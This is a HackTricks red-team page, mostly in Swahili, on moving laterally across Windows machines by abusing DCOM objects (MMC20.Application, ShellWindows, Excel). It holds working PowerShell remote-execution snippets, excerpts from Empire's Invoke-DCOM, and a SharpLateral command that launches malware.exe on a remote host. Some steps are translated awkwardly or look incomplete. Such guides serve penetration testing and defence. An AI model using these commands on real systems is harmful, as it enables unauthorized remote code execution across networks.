9 KiB
DCOM Exec
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Try Hard Security Group
![](/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg)
{% embed url="https://discord.gg/tryhardsecurity" %}
MMC20.Application
Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho la asili kutoka https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
Distributed Component Object Model (DCOM) objects zina uwezo wa kuvutia kwa mwingiliano wa mtandao na vitu. Microsoft inatoa nyaraka kamili kwa DCOM na Component Object Model (COM), zinazopatikana hapa kwa DCOM na hapa kwa COM. Orodha ya maombi ya DCOM inaweza kupatikana kwa kutumia amri ya PowerShell:
Get-CimInstance Win32_DCOMApplication
The COM object, MMC Application Class (MMC20.Application), inaruhusu uandishi wa operesheni za MMC snap-in. Kwa hakika, kitu hiki kina ExecuteShellCommand
njia chini ya Document.ActiveView
. Taarifa zaidi kuhusu njia hii inaweza kupatikana hapa. Angalia inavyofanya kazi:
Kipengele hiki kinarahisisha utekelezaji wa amri kupitia mtandao kupitia programu ya DCOM. Ili kuingiliana na DCOM kwa mbali kama admin, PowerShell inaweza kutumika kama ifuatavyo:
[activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))
Hii amri inajiunga na programu ya DCOM na inarudisha mfano wa kitu cha COM. Njia ya ExecuteShellCommand inaweza kisha kuitwa ili kutekeleza mchakato kwenye mwenyeji wa mbali. Mchakato unajumuisha hatua zifuatazo:
Angalia mbinu:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com.Document.ActiveView | Get-Member
Pata RCE:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com | Get-Member
# Then just run something like:
ls \\10.10.10.10\c$\Users
ShellWindows & ShellBrowserWindow
Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho la asili https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Kitu cha MMC20.Application kiligundulika kuwa hakina "LaunchPermissions" wazi, kikirudi kwenye ruhusa zinazoruhusu Wasimamizi kupata. Kwa maelezo zaidi, thread inaweza kuchunguzwa hapa, na matumizi ya @tiraniddo’s OleView .NET kwa ajili ya kuchuja vitu bila Ruhusa ya Uzinduzi inashauriwa.
Vitu viwili maalum, ShellBrowserWindow
na ShellWindows
, vilisisitizwa kutokana na ukosefu wa Ruhusa za Uzinduzi wazi. Ukosefu wa kiingilio cha LaunchPermission
katika HKCR:\AppID\{guid}
unaashiria ukosefu wa ruhusa wazi.
ShellWindows
Kwa ShellWindows
, ambayo haina ProgID, mbinu za .NET Type.GetTypeFromCLSID
na Activator.CreateInstance
zinasaidia kuunda kitu kwa kutumia AppID yake. Mchakato huu unatumia OleView .NET kupata CLSID ya ShellWindows
. Mara tu inapoundwa, mwingiliano unaweza kufanyika kupitia mbinu ya WindowsShell.Item
, ikisababisha mwito wa mbinu kama Document.Application.ShellExecute
.
Mifano ya amri za PowerShell ilitolewa ili kuunda kitu na kutekeleza amri kwa mbali:
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
Lateral Movement with Excel DCOM Objects
Lateral movement inaweza kupatikana kwa kutumia DCOM Excel objects. Kwa maelezo ya kina, ni vyema kusoma mjadala kuhusu kutumia Excel DDE kwa ajili ya lateral movement kupitia DCOM kwenye blogu ya Cybereason.
Mradi wa Empire unatoa script ya PowerShell, ambayo inaonyesha matumizi ya Excel kwa ajili ya remote code execution (RCE) kwa kubadilisha DCOM objects. Hapa chini kuna vipande kutoka kwa script inayopatikana kwenye hifadhi ya GitHub ya Empire, ikionyesha mbinu tofauti za kutumia Excel kwa RCE:
# Detection of Office version
elseif ($Method -Match "DetectOffice") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$isx64 = [boolean]$obj.Application.ProductCode[21]
Write-Host $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
# Registration of an XLL
elseif ($Method -Match "RegisterXLL") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$obj.Application.RegisterXLL("$DllPath")
}
# Execution of a command via Excel DDE
elseif ($Method -Match "ExcelDDE") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$Obj.DisplayAlerts = $false
$Obj.DDEInitiate("cmd", "/c $Command")
}
Vifaa vya Utaftaji wa Kando
Vifaa viwili vinasisitizwa kwa ajili ya kuendesha mbinu hizi:
-
Invoke-DCOM.ps1: Skripti ya PowerShell inayotolewa na mradi wa Empire ambayo inarahisisha mwito wa mbinu tofauti za kutekeleza msimbo kwenye mashine za mbali. Skripti hii inapatikana kwenye hifadhi ya Empire GitHub.
-
SharpLateral: Kifaa kilichoundwa kwa ajili ya kutekeleza msimbo kwa mbali, ambacho kinaweza kutumika na amri:
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
Vifaa vya Kiotomatiki
- Skripti ya Powershell Invoke-DCOM.ps1 inaruhusu kwa urahisi kuita njia zote zilizotajwa za kutekeleza msimbo kwenye mashine nyingine.
- Unaweza pia kutumia SharpLateral:
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
References
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
- https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Jaribu Kikundi cha Usalama
![](/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg)
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.